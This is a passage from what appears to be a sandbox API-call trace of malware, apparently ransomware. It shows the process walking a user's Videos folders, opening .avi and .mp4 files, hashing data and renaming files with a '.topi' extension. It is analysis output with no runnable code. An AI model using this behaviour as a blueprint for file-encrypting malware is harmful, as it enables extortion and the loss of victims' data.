pdwDataLen=0x9ccfa54) returned 1 [0097.997] GetLastError () returned 0x0 [0097.997] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.997] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.998] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.998] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.998] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x3cb0) returned 0x99fc2d8 [0097.998] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.998] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbc80 [0097.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5078 [0097.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbcc8 [0097.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5090 [0097.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e50c0 [0097.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.998] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e50d8 [0097.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.999] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e50c0 | out: hHeap=0x680000) returned 1 [0097.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e50d8 | out: hHeap=0x680000) returned 1 [0097.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0097.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e50d8 [0097.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0097.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e50c0 [0097.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0097.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x3191bd8 [0097.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e50d8 | out: hHeap=0x680000) returned 1 [0097.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e50c0 | out: hHeap=0x680000) returned 1 [0097.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0098.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0098.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0098.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0098.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0098.000] GetCurrentThreadId () returned 0x8c4 [0098.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0098.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99fa8e0 [0098.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0098.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0098.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0098.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0098.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0098.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0098.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.000] GetCurrentThreadId () returned 0x8c4 [0098.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0098.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0098.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0098.001] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0098.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0098.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0098.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0098.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0098.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0098.001] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0098.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0098.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0098.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0098.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0098.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0098.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0098.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0098.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e50c0 [0098.001] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0098.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0098.001] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0098.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0098.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0098.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0098.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0098.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e50d8 [0098.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0098.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0098.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0098.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e50a8 [0098.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0098.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0098.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0098.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0098.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0098.003] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\Qlx4jhl_sL7rq.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\sasxhx217z\\qlx4jhl_sl7rq.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\z4k8sZRNNGS3Ve7W-\\sAsxhx217z\\Qlx4jhl_sL7rq.avi.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\z4k8szrnngs3ve7w-\\sasxhx217z\\qlx4jhl_sl7rq.avi.topi")) returned 1 [0098.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0098.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0098.003] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0098.005] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x29da8c10, ftCreationTime.dwHighDateTime=0x1d5c356, ftLastAccessTime.dwLowDateTime=0x6700eb50, ftLastAccessTime.dwHighDateTime=0x1d5b5b1, ftLastWriteTime.dwLowDateTime=0x6700eb50, ftLastWriteTime.dwHighDateTime=0x1d5b5b1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sFJurkoQTJwuNyD54_K", cAlternateFileName="SFJURK~1")) returned 1 [0098.005] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0098.005] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0098.005] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\HBcE7 BrxksR8J\\Kl1nm7nD8LS\\") returned="Kl1nm7nD8LS\\" [0098.005] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\HBcE7 BrxksR8J\\") returned="HBcE7 BrxksR8J\\" [0098.005] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\") returned="_tGjm1G\\" [0098.005] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0098.006] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0098.006] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0098.006] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0098.006] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0098.006] PathFindFileNameW (pszPath="") returned="" [0098.006] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\HBcE7 BrxksR8J\\Kl1nm7nD8LS\\G7Te.mp4") returned=".mp4" [0098.006] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\HBcE7 BrxksR8J\\Kl1nm7nD8LS\\G7Te.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_tgjm1g\\hbce7 brxksr8j\\kl1nm7nd8ls\\g7te.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0098.006] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=79917) returned 1 [0098.006] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0098.010] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x13807, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.010] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0098.011] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0098.012] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0098.012] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.012] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0098.012] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0098.012] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0098.012] GetLastError () returned 0x0 [0098.012] CryptDestroyHash (hHash=0x31c7580) returned 1 [0098.012] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0098.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0098.013] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0098.013] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0098.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0098.013] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0098.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0098.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0098.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x13830) returned 0x9a06a00 [0098.013] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.013] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0098.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0098.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0098.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0098.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0098.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbcc8 [0098.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5090 [0098.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbd10 [0098.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e50a8 [0098.013] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e50d8 [0098.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0098.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e50f0 [0098.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0098.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0098.014] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0098.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0098.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e50d8 | out: hHeap=0x680000) returned 1 [0098.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e50f0 | out: hHeap=0x680000) returned 1 [0098.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0098.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0098.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0098.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0098.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0098.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e50f0 [0098.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0098.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e50d8 [0098.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0098.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0098.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0098.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0098.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0098.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0098.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0098.014] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0098.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0098.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e50f0 | out: hHeap=0x680000) returned 1 [0098.014] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0098.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e50d8 | out: hHeap=0x680000) returned 1 [0098.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0098.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0098.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0098.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0098.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0098.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0098.015] GetCurrentThreadId () returned 0x8c4 [0098.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0098.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99fa970 [0098.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0098.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0098.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0098.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0098.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0098.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0098.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.015] GetCurrentThreadId () returned 0x8c4 [0098.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03530 [0098.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.015] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03530 | out: hHeap=0x680000) returned 1 [0098.015] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0098.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0098.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0098.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0098.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0098.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0098.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0098.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0098.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0098.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0098.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0098.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0098.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0098.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0098.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0098.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e50d8 [0098.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0098.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0098.016] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0098.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0098.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0098.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0098.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0098.016] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e50f0 [0098.016] HeapFree (in: hHeap=0x680000, 